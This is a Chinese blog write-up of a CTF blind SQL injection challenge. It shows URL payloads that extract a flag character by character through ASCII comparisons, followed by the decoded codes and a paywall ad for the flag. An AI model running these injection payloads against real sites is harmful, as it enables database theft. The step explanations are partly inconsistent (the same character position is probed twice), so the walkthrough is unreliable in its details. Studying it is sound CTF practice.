老套路加个'报错

西普CTF-简单的sql注入之3-以夕阳落款
西普CTF-简单的sql注入之3-以夕阳落款

通过猜解获得表名

西普CTF-简单的sql注入之3-以夕阳落款

通过猜解获得列名

西普CTF-简单的sql注入之3-以夕阳落款

猜解字段

?id=1'and ascii(substr((select flag from flag),2,1))>102%23不报错,说明大于或等于102

?id=1'and ascii(substr((select flag from flag),2,1))>103%23报错,说明小于103

由此判断获取第一个字段ASCII码103

?id=1'and ascii(substr((select flag from flag),2,1))<108%23报错,说明大于或等于108

?id=1'and ascii(substr((select flag from flag),2,1))<109%23不报错,说明小于109

由此判断第二个字段的ASCII码108

然后根据上述方法依次获取剩下的字段

97 103 123 89 48 117 95 64 114 51 95 53 79 95 100 65 109 110 95 57 48 79 100 125

Flag:

温馨提示: 此处内容需要评论本文后刷新才能查看,支付2元即可直接查看所有Flag。

小广告:关于获取西普实验吧所有Writeup请点击这里查看索引

查看所有Flag需要付费,需要获取所有Flag的童鞋请访问这里成为付费用户,可以自助把自己的注册邮箱加入网站白名单,即可免回复看到本站所有Flag

Flag大全地址:所有Flag

PS:本站不是实验吧的官方站点,纯粹是个人博客,收取Flag费用仅是维持服务器费用,做站不易,且行窃珍惜,如果喜欢我的博客,愿意捐赠的,可以扫描下面的二维码

微信二维码:
支付宝二维码: